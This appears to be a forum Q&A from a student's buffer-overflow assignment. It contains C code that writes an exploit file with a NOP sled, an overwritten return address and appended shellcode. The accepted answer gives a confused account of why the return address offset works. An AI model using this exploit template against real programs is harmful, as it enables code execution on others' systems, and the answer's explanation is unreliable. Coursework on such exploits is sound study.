# Exploit BOF in c?

Tags: c, memory-address, buffer-overflow

```
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    *((long *) (buffer + 36)) = 0xffffce78 + 0x80;

    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));

    /* You need to fill the buffer with appropriate contents here */ 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
```

I'm just doing my assignment on BOF, now I know the two things to perform BOF.

> 1, address of instruction pointer, so as to point to my shellcode
>
> 2, address of my shell code.

The buffer address is `0xffffce28` in gdb and `0xffffce78` in C, $ebp points to `0xffffce48`. So to get the address of eip, `0xffffce48 - 0xffffce28 + 4 = 36`. But storing my shell code address, `0xffffce78`,  in buffer+36 raises illegal instruction(core dumped), but adding `0x80` with the buffer address works why?

Comment: You are assuming that `char buffer[]` is aligned on a `long` word boundary. That might be a problem on some CPUs.

Comment: "Initialize buffer with 0x90 (NOP instruction)" --> C does not define 0x90  as the _NOP instruction_.  Add   tags indicating what processor you are using and what compiler to add clarity to  the question.

Comment: @DavidRTribble it is always invalid, not processor-dependent.

Answer (score 0, accepted):

Since the shell code is at the end of the buffer. The first instruction trying to execute is the eip value, `*((long *) (buffer + 36)) = 0xffffce78 + 0x80;` so this is not a legal instruction.